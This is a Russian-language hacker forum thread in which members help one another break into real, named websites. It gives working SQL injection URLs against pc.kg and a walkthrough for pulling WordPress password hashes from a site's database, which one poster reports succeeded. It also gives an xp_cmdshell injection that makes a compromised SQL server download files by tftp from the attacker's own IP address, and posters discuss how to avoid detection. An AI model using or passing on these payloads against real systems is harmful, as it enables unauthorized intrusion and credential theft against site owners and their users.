Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    20
    Likes Received:
    2
    Reputations:
    -1
    Народ вот нашел уязвимость, судя по всему там стоит MSSQL, как дальше добить эту скулю не пойму, так как там нельзя использовать буквы
    http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+null,null,123+from+information_schema.tables--
     
  2. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Чар тебе в помощь.
     
  3. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    20
    Likes Received:
    2
    Reputations:
    -1
    чар тоже не работает)), как быть?
     
  4. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    20
    Likes Received:
    2
    Reputations:
    -1
    можно ли пролезть вот в такую багу сайта?
    http://www.hotindex.ru/Details.aspx?id=6927
     
  5. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Багом назвать это трудно конечно...
     
  6. none222

    none222 Guest

    Reputations:
    0
    Первое поле нормально выводится:

    http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+table_name,null,null+from+information_schema.tables--


    нельзя, это не баг
     
  7. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    помогите.. через mysql подобрал таблицы и колонки нашел таблицу wp_users запросом через information_schema в ней через information_schema.columns намел калонку user_pass и user_name вообщем все что нужно для счастья. но при запросе 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+wp_users -- пишет Table 'hoys.wp_users' doesn't exist и ошибки тоесть он не может таблицу найти автоматом приписывает логин свой... в чем проблема? как это обойти?
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ghost0ff Она в другой базе, это 1000000 раз разбиралось, последний раз вчера в этой-же теме
    О_o Какой ещё логин? :D
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    1) Ищем что такое на самом деле hoys:

    +union+select+1,table_schema,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name='wp_users'--

    Допустим вывело на экран "forum", тогда твой запрос будет такой:

    2) 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+forum.wp_users --
     
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Я тебе без вяких поисков скажу, это база с которой работает скрипт
    (только тсссс, это превад инфа) :D
     
  11. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    О! все выбил хэш. Спасибо большое. +1. впредь глупых вопросов забавать не буду ;)
     
  12. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Есть sql server с правами SA. Через xp_cmdshell телнетится с него куда-либо не могу , но могу пинговать. Как можно внешний ip этого sql сервера пробить. К примеру у меня есть дедик (WIN). Что можно на него заинсталить, чтоб оно отображало кто пингует? :) ТОлько простенькое, файр туда ставить не хочется :D
     
  13. criz

    criz Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    293
    Likes Received:
    40
    Reputations:
    6
    SHS, ставь сниффер :)
     
  14. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Cain & Abel сойдет? И где там палить эти пакеты. :)
     
  15. criz

    criz Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    293
    Likes Received:
    40
    Reputations:
    6
    Хз, каина не юзал. Юзал вот это:
    или
     
  16. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Пробну через Ettercap пожалуй.
     
  17. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Не вышло чет, мб я что-либо сделал неправильно. Жду советов. Желательно по конкретнее что да как )
     
  18. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Скачивай tftp сервер (http://tftpd32.jounin.net/tftpd32_download.html), запускай на своем компе, указав папку, из которой будут закачиваться файлы на удаленный сервер. Теперь выполняй команду через инъекцию:
    ;exec master..xp_cmdshell 'tftp -i [твой ip] GET [любой файл из папки] [путь нового файла]'--
    например
    ;exec master..xp_cmdshell 'tftp -i 12.34.56.78 GET blabla.txt C:\blabla.txt'--
    Во время закачивания файл на удаленный сервер, можно видеть список активных подключений. Во вкладке Log viewer также можно увидеть адреса всех клиентов.
     
  19. [:|||||:]

    [:|||||:] Banned

    Joined:
    29 May 2008
    Messages:
    68
    Likes Received:
    59
    Reputations:
    11
    палевно все-таки к своему айпи конектица...
     
  20. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Да вот в том то и дело, что кроме пинга я ничего не могу делать (видать файр, ито не стандартный).
     
Thread Status:
Not open for further replies.